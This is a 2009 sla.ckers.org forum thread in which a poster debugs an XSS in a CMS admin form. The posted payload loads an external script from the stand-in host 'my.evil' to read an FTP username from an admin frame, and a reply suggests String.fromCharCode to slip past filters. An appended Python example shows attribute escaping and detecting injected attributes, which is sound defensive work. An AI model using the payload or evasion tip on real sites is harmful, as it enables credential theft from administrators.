Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
onmouseover and external javascript?
Posted by: GaSmo
Date: October 26, 2009 04:07AM

Hi there,

Still having problems with my XSS in my CMS.
I can only run an onmouseover - the XSS is in a form tag:

<form action="admin/index.php?menus" onmouseover=alert(23)" method="post" name="menu">
(works fine)
The next step I think I have to take is to document.write my XSS payload.
But this doesn't work.

XSS-code:
" onmouseover="document.write('<script src=\"http://my.evil/xss.js\"><\/script>');"

xss.js-code:

document.write('<iframe src=\"admin/index.php?ftp\" name=\"ftpframe\"');
document.write('<script>alert(contentDocument.ftpframe.document.adminform.ftpuser.value)');


What's wrong with my idea?



Edited 1 time(s). Last edit at 10/26/2009 04:09AM by GaSmo.

Re: onmouseover and external javascript?
Posted by: PaPPy
Date: October 26, 2009 07:37AM

when u use ur xss code, does any of it get filtered out?
what does the output html look like?

maybe they are filtering out ur <script> tags

try String.fromCharCode

http://www.xssed.com/archive/author=PaPPy/
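
The attribute breakout discussed in this thread, seen from the CMS side, as an added example that is not part of the original posts and not the CMS's own code: a Python model of the form template (the function names and the EXPECTED_ATTRS allow-list are assumptions) that renders the tag with and without attribute encoding, then parses the output to list attributes the template never emits. In PHP the equivalent encoding is htmlspecialchars() with ENT_QUOTES.

```python
# Added example: a Python model of the form rendering, not the CMS's code.
from html import escape
from html.parser import HTMLParser

# Attributes the (assumed) template intends to emit on the <form> tag.
EXPECTED_ATTRS = {"action", "method", "name"}


def render_form_unsafe(menu_param: str) -> str:
    # Request value concatenated straight into a double-quoted attribute.
    return f'<form action="admin/index.php?{menu_param}" method="post" name="menu">'


def render_form_escaped(menu_param: str) -> str:
    # quote=True also encodes " and ', so the value cannot close the attribute.
    safe = escape(menu_param, quote=True)
    return f'<form action="admin/index.php?{safe}" method="post" name="menu">'


class _FormAttrs(HTMLParser):
    """Collects the attribute names seen on every <form> start tag."""

    def __init__(self):
        super().__init__()
        self.attrs = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.attrs.extend(name for name, _ in attrs)


def unexpected_form_attrs(html: str) -> list:
    """Attribute names on <form> that the template never emits."""
    parser = _FormAttrs()
    parser.feed(html)
    parser.close()
    return sorted(set(parser.attrs) - EXPECTED_ATTRS)


# Constructed input, taken from the rendered tag quoted in the question.
SAMPLE = 'menus" onmouseover=alert(23)'

if __name__ == "__main__":
    for render in (render_form_unsafe, render_form_escaped):
        out = render(SAMPLE)
        print(render.__name__, unexpected_form_attrs(out), out)
```

The same parse-and-compare check can run as a regression test over rendered admin pages, so a template that stops encoding a value is caught before release.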
